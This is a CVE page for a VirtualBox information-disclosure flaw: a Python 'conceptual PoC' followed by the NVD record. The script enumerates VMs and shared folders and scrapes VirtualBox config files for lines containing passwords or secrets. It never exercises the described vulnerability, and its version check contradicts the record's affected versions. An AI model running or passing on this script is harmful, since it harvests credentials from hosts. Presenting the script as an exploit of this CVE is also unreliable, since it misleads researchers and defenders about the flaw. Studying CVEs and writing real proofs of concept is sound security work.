CVE-2025-61759

# CVE-2025-61759 Oracle VM VirtualBox Core Component Information Disclosure PoC # Note: This is a conceptual PoC based on the vulnerability description. # The actual exploitation requires local access to a system running affected VirtualBox versions. import subprocess import os import ctypes import struct def check_virtualbox_version(): """Check if the installed VirtualBox version is vulnerable""" try: result = subprocess.run( ['VBoxManage', '--version'], capture_output=True, text=True, timeout=10 ) version = result.stdout.strip() print(f"[*] Detected VirtualBox version: {version}") # Parse version number parts = version.split('.') if len(parts) >= 2: major = int(parts[0]) minor = int(parts[1]) patch = int(parts[2].split('_')[0].split('r')[0]) if len(parts) > 2 else 0 # Vulnerable versions: 7.1.12 and 7.2.2 if (major == 7 and minor == 1 and patch <= 12) or \ (major == 7 and minor == 2 and patch <= 2): print("[!] VULNERABLE version detected!") return True return False except Exception as e: print(f"[-] Error checking version: {e}") return False def enumerate_shared_resources(): """Enumerate VirtualBox shared resources accessible to low-privileged user""" print("[*] Enumerating VirtualBox shared resources...") try: # List shared folders result = subprocess.run( ['VBoxManage', 'list', 'sharedfolders'], capture_output=True, text=True, timeout=10 ) print(f"[*] Shared folders:\n{result.stdout}") # List running VMs result = subprocess.run( ['VBoxManage', 'list', 'runningvms'], capture_output=True, text=True, timeout=10 ) print(f"[*] Running VMs:\n{result.stdout}") # List host-only interfaces result = subprocess.run( ['VBoxManage', 'list', 'hostonlyifs'], capture_output=True, text=True, timeout=10 ) print(f"[*] Host-only interfaces:\n{result.stdout}") except Exception as e: print(f"[-] Error enumerating resources: {e}") def attempt_core_component_access(): """Attempt to access Core component resources beyond privilege level""" print("[*] Attempting to access Core component resources...") # Attempt to read VirtualBox configuration files config_paths = [ os.path.expanduser('~/.config/VirtualBox/VirtualBox.xml'), '/etc/vbox/vbox.cfg', os.path.expanduser('~/.VirtualBox/VirtualBox.xml'), ] for path in config_paths: if os.path.exists(path): try: with open(path, 'r') as f: content = f.read() if 'password' in content.lower() or 'secret' in content.lower(): print(f"[!] Sensitive data found in {path}") # Extract sensitive information for line in content.split('\n'): if 'password' in line.lower() or 'secret' in line.lower(): print(f" {line.strip()}") except PermissionError: print(f"[-] Permission denied: {path}") # Attempt to access VirtualBox IPC/RPC interfaces try: result = subprocess.run( ['VBoxManage', 'list', 'systemproperties'], capture_output=True, text=True, timeout=10 ) if result.returncode == 0: print(f"[*] System properties accessible (potential info leak):\n{result.stdout[:500]}") except Exception as e: print(f"[-] Error accessing system properties: {e}") def main(): print("=" * 60) print("CVE-2025-61759 - Oracle VM VirtualBox Core Info Disclosure") print("CVSS 3.1: 6.5 (MEDIUM)") print("Affected: VirtualBox 7.1.12, 7.2.2") print("=" * 60) if check_virtualbox_version(): enumerate_shared_resources() attempt_core_component_access() print("\n[!] System appears vulnerable to CVE-2025-61759") print("[!] Recommend upgrading to the latest patched version") else: print("\n[*] System does not appear to be vulnerable") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-61759", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:52.373", "lastModified": "2025-10-23T16:03:36.487", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are 7.1.12 and 7.2.2. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle VM VirtualBox accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.1.12:*:*:*:*:*:*:*", "matchCriteriaId": "D0846C94-6984-4E7F-9670-E5238AA8CA5F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:vm_virtualbox:7.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "613B5554-B57C-4AF9-AC10-E96278C44FC4"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}